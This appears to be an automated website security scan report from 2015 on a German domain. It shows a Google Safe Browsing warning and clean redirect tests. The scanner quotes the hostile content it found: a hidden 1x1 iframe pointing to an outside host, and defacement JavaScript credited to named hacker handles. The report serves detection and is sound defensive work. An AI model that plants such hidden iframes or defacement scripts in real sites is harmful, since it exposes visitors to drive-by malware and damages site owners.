Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=stephani-bremen.de
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://stephani-bremen.de/ | 200 OK Content-Length: 7789 Content-Type: text/html | suspicious |
Hidden iFrame found. The same iFrame was found in 52 websites. size: 1x1 src: http://www.trenz.pl/rc/ <iframe src="http://www.trenz.pl/rc/" width=1 height=1 frameborder=0> Deface/Content modification. The following signature was found: hacked by silo ...[1290 bytes skipped]... doc = "document.all"; sty = ".style"; htm = "" } var text1 = "", text2 = "", count = 0, count2=0;msg = new Array();msg[0] = "<center> <font face=Webdings Size=100 color=#c0c0c0>!</font><font face=impact Size=8 color=#ffffff>Hacked; By silo /**/ By mc_katliam</font><font face=Webdings Size=100 color=#c0c0c0>!</font> ";msg[1] = " <font face=Century Gothic Size=4 color=#FFFF00>hacked by silo</font> ";msg[2] = "<font face=Trebuchet MS size=4><center><hl>hacked by mc_katliam</hl></center></font> ";msg[3] = " <font face=impact Size=5 color=#FFFF33></font> ";msg[4] = "<font face=arial Size=5 color=#ff0000>KURDISH HACK TEAM</font>";msg[5] = "<font face=Century Gothic Size=5 color=#99FF00>huh</font>";msg[6] = "<font color=#FFFF33 size=6>iSLAMiC && KURDiSH HACKERS...!</font&g ...[6820 bytes skipped]... | ||
http://stephani-bremen.de/test404page.js | 404 Not Found Content-Length: 1363 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: stephani-bremen.de
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 30 Jun 2015 13:06:17 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 30 Jun 2015 13:06:18 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: eea865426019d0a59d2a063d6e933874=5902d815ba3095af9ab6319d56062b14; path=/
X-Powered-By: PHP/4.4.9
GET / HTTP/1.1
Host: stephani-bremen.de
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 30 Jun 2015 13:06:17 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 30 Jun 2015 13:06:18 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: eea865426019d0a59d2a063d6e933874=5902d815ba3095af9ab6319d56062b14; path=/
X-Powered-By: PHP/4.4.9
Second query (visit from search engine):
GET / HTTP/1.1
Host: stephani-bremen.de
Referer: http://www.google.com/search?q=stephani-bremen.de
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: stephani-bremen.de
Referer: http://www.google.com/search?q=stephani-bremen.de
Result:
The result is similar to the first query. There are no suspicious redirects found.